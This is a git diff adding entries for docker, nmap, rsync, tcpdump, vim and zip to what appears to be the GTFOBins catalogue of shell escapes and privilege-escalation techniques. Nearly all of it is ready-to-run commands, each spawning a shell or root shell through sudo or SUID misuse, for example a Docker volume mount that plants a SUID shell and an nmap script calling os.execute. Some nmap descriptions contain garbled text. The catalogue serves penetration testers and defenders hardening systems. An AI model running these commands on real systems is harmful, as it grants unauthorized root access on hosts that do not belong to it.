diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md new file mode 100644 index 0000000..c27e24c --- /dev/null +++ b/_gtfobins/docker.md @@ -0,0 +1,19 @@ +--- +description: | + Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group. + + This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`. +functions: + execute-interactive: + - code: | + docker run --rm -v /home/$USER:/h_docs ubuntu \ + sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p + sudo-enabled: + - code: | + sudo docker run --rm -v /home/$USER:/h_docs ubuntu \ + sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p + suid-enabled: + - code: | + ./docker run --rm -v /home/$USER:/h_docs ubuntu \ + sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p +--- diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md new file mode 100644 index 0000000..cc93942 --- /dev/null +++ b/_gtfobins/nmap.md @@ -0,0 +1,18 @@ +--- +functions: + execute-non-interactive: + - description: Echoing of input characters3ers is disabled. + code: | + echo 'os.execute("/bin/sh")' > /tmp/script.nse + nmap --script=/tmp/script.nse + sudo-enabled: + - description: Echoing of input characters3ers is disabled. + code: | + echo 'os.execute("/bin/sh")' > /tmp/script.nse + sudo nmap --script=/tmp/script.nse + suid-enabled: + - description: Echoing of input characters3ers is disabled. + code: | + echo 'os.execute("/bin/sh -p")' > /tmp/script.nse + ./nmap --script=/tmp/script.nse +--- diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md new file mode 100644 index 0000000..754d848 --- /dev/null +++ b/_gtfobins/rsync.md @@ -0,0 +1,9 @@ +--- +functions: + execute-interactive: + - code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null + sudo-enabled: + - code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null + suid-enabled: + - code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null +--- diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md new file mode 100644 index 0000000..aa3368a --- /dev/null +++ b/_gtfobins/tcpdump.md @@ -0,0 +1,17 @@ +--- +functions: + execute-non-interactive: + - code: | + COMMAND='id > /tmp/output' + TF=$(mktemp -u) + echo "$COMMAND" > $TF + chmod +x $TF + tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF + suid-enabled: + - code: | + COMMAND='id > /tmp/output' + TF=$(mktemp -u) + echo "$COMMAND" > $TF + chmod +x $TF + sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF +--- diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md new file mode 100644 index 0000000..fb45d0b --- /dev/null +++ b/_gtfobins/vim.md @@ -0,0 +1,19 @@ +--- +functions: + execute-interactive: + - code: vim -c ':!/bin/sh' + - code: | + vim + :set shell=/bin/sh + :shell + file-write: + - code: | + vim file_to_write + w + file-read: + - code: vim file_to_read + suid-enabled: + - code: ./vim -c ':!/bin/sh -p' + sudo-enabled: + - code: sudo vim -c ':!/bin/sh' +--- diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md new file mode 100644 index 0000000..13f9031 --- /dev/null +++ b/_gtfobins/zip.md @@ -0,0 +1,15 @@ +--- +functions: + execute-interactive: + - code: | + zip /tmp/x.zip /etc/hosts -T -TT 'sh #' + rm /tmp/x.zip + sudo-enabled: + - code: | + sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #' + sudo rm /tmp/x.zip + suid-limited: + - code: | + ./zip /tmp/x.zip /etc/hosts -T -TT 'sh #' + sudo rm /tmp/x.zip +---